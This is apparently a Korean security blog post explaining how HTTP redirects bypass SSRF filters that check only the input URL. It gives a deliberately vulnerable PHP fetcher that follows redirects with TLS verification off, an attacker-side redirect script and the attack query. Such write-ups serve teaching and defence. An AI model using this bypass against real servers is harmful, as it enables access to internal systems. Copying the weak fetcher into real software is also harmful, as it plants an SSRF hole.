오늘도 SSRF 우회 패턴 정리해봅니다. 자주 쓰던 방법 중 하나인데 최근에 제대로 먹혀서 기분이 좋네요. 별다른건 아니고 HTTP Redirect를 이용한 우회 방법입니다.

https://gph.is/2hxuIjt

What is HTTP Redirect?

이름은 거창하지만 302, 301 Response 및 Location 헤더 등으로 HTTP 페이지가 렌더링되기 전에 다른 페이지로 이동되는 걸 의미합니다.
HTTP Status Code    Temporary / Permanent    Cacheable    Method
301    Permanent    yes    GET / POST may change
302    Temporary    not by default    GET / POST may change
303    Temporary    never    always GET
307    Temporary    not by default    may not change
308    Permanent    by default    may not change

Bypass SSRF Protection

한가지 조건이 있습니다. 검증 로직이 URL 패턴이나 도메인 정보를 보고있을 때, 즉 Redirect 처리를 하지 않은 상태에서 검증하는 경우 우회할 수 있는 방법으로 쓰입니다.
예를들어 이런 코드가 있다고 칩시다.
<?php

function protect_ssrf($data){
  if(strpos($data,"www.hahwul.com") !== false){
    exit(); // url에 www.hahwul.com이 있으면 차단
  }
}

function getHtml($url, $post = null) {
    protect_ssrf($url);
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    if(!empty($post)) {
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    } 
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}

echo getHtml($_GET['q']);
?>

정상 로드

차단되어 로드도지 않음

이런 경우에 아래처럼 hahwul.com이 들어간 도메인은 exit() 구문으로 인해 contents를 들고오지 못합니다. 일반적인 경우에는 내부망(사설대역), 내부 도메인 등의 데이터로 검증하고 있겠죠.

저 코드는 웹 요청을 다 따라가지 않고 요청전에 입력값으로만 검증하기 떄문에 아래 방법으로 우회할 수 있습니다. 아래와 같이 HTTP Redirect 코드를 공격자 서버에 두고..

<?php
header('Location: https://www.hahwul.com');
?>

실제로 이 페이지는 접근하게 되면 이런 Response가 발생하겠죠.

HTTP/1.1 302 Found
Server: nginx
Date: Fri, 22 Feb 2019 23:11:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP='NOI CURa ADMa DEVa TAIa OUR DELa BUS IND PHY ONL UNI COM NAV INT DEM PRE'
Location: https://www.hahwul.com

SSRF 취약점이 있는 저 페이지도 위에 url을 접근했을 떄 동일한 결과를 받을겁니다. 대신 검증 로직 이후에 Location 헤더를 따라가기 떄문에 www.hahwul.com에 대한 검증 구간이 있어도 정상적으로 불러올 수 있습니다.

?q=http://your_domain/hr.php


댓글 2개: